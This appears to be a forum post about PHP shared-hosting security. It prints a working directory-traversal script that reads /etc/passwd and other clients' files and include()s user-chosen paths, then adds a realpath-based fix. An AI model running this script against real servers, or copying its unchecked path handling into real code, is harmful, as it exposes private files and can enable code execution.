I write and maintain lots of sites on shared servers around the net. I found most of these servers that run PHP do so in a pretty unsafe mode. I was reading this story when it occurred to me to try the malicious code on some of the sites I maintain. So I fooled with the code a little and tried posting this PHP code to some of the servers I use.
<?php
// $action and $folder are expected to arrive straight from the query string via
// register_globals (the unchecked form data the post talks about); nothing here
// validates $folder, which is the whole point of the test.
switch ($action) {
    case "showit":
        error_reporting(0);
        $location = "../../$folder"; // Move up two directories from the script
        print "<p>Location is $location</p>";
        $parent = dir($location);
        if (!$parent) {
            // Not a directory, so treat it as a file and dump it
            print '<p>Here is file</p>';
            include("$location");
            break;
        }
        print '<h1>Security Hole</h1>';
        print "<p>Here are the contents of the $location</p>";
        // List the contents of the chosen directory
        // i.e.: /usr/local/websites
        while ($entry = $parent->read()) {
            print "<p><a href=\"showme.php?action=showit&folder=$folder/$entry\">$entry</a></p>";
        }
        break;

    default:
        $location = "../../$folder"; // Move up two directories from the script
        $parent = dir($location);
        print '<h1>Security Hole</h1>';
        print '<p>Here is some stuff that you probably should not be privileged to see..</p>';
        // List the contents of the chosen directory
        // i.e.: /usr/local/websites
        while ($entry = $parent->read()) {
            print "<p><a href=\"showme.php?action=showit&folder=$entry\">$entry</a></p>";
        }
        break;
}
?>
Well what do you know...it worked on every server I tried it on and I was able to see lots of stuff I should not have been able to see. (including the ever popular /etc/passwd file)
So...I felt it my duty to inform the sysadmins of this problem due to the huge privacy violations it presented. They didn't like me for a few days.
The obvious answer is in the php.ini, more specifically safe mode was off and there was no doc_root or usr_root set. But since the whole thing was on a shared server, most of the sysadmins were unwilling to fix the hole and chose to let it be, as (they claim) it would break lots of code on their clients' sites. (My sites have since moved to a better situation, but still....)
So the question is....on a shared server where you cannot set safe_mode on with one valid doc_root or usr_root...how can you tighten this hole up?
(PS...if you have anything on shared servers where some guy might let form data get by without checking it first...you may want to run this script just to see how private your files are)
Love,
tha_mink
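An added example, not part of tha_mink's post and not anything the sysadmins in question deployed: when you cannot touch php.ini, the hole the script above exploits (a folder name taken from form data and glued onto a path without any check) can still be closed in the application itself. The snippet below assumes a hypothetical base directory $BASE_DIR and hypothetical helper names safe_path_within() and show_entry(); it canonicalises the requested path with realpath() and refuses anything that resolves outside the base, which is what "checking the form data first" amounts to for this kind of script.

```php
<?php
// Added example (not from the original post): application-side containment
// check for a user-supplied folder name when safe_mode / doc_root / open_basedir
// cannot be set on a shared host. Names below are assumptions.

declare(strict_types=1);

// Everything this script may ever list or display lives under here (assumed path).
$BASE_DIR = __DIR__ . '/public_docs';

/**
 * Resolve $userPath relative to $base and return its canonical path, or null
 * if it does not exist or escapes $base. realpath() collapses "..", symlinks
 * and doubled separators, so the prefix comparison is done on canonical form.
 */
function safe_path_within(string $base, string $userPath): ?string
{
    $realBase = realpath($base);
    if ($realBase === false) {
        return null;                        // base missing: fail closed
    }
    if (strpos($userPath, "\0") !== false) {
        return null;                        // NUL bytes never reach the filesystem
    }
    $candidate = realpath($realBase . DIRECTORY_SEPARATOR . $userPath);
    if ($candidate === false) {
        return null;                        // does not exist or is unreadable
    }
    // Compare against the base plus a trailing separator, so that a sibling
    // such as "/srv/docs2" is not accepted as being inside "/srv/docs".
    $prefix = rtrim($realBase, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($candidate !== $realBase && strpos($candidate, $prefix) !== 0) {
        return null;                        // "../../etc/passwd" lands here
    }
    return $candidate;
}

/** Same behaviour as the original script (list a folder or show a file), confined to $base. */
function show_entry(string $base, string $userPath): void
{
    $path = safe_path_within($base, $userPath);
    if ($path === null) {
        http_response_code(403);
        print '<p>Not permitted.</p>';
        return;
    }
    if (is_dir($path)) {
        foreach (scandir($path) as $entry) {
            if ($entry === '.' || $entry === '..') {
                continue;
            }
            $rel  = ltrim($userPath . '/' . $entry, '/');
            $href = 'showme.php?action=showit&folder=' . rawurlencode($rel);
            printf(
                '<p><a href="%s">%s</a></p>',
                htmlspecialchars($href, ENT_QUOTES),
                htmlspecialchars($entry, ENT_QUOTES)
            );
        }
        return;
    }
    // Send the file as plain text; never include() a user-chosen file as code.
    header('Content-Type: text/plain');
    readfile($path);
}

// Read the parameter explicitly instead of relying on register_globals.
$folder = isset($_GET['folder']) ? (string) $_GET['folder'] : '';
show_entry($BASE_DIR, $folder);
?>
```

With this in place a request for folder=../../../../etc/passwd resolves to a path whose prefix is not $BASE_DIR and gets a 403 instead of the file; the realpath() step also matters because a naive check for the literal string ".." misses symlinks and encoded variants that the filesystem still honours.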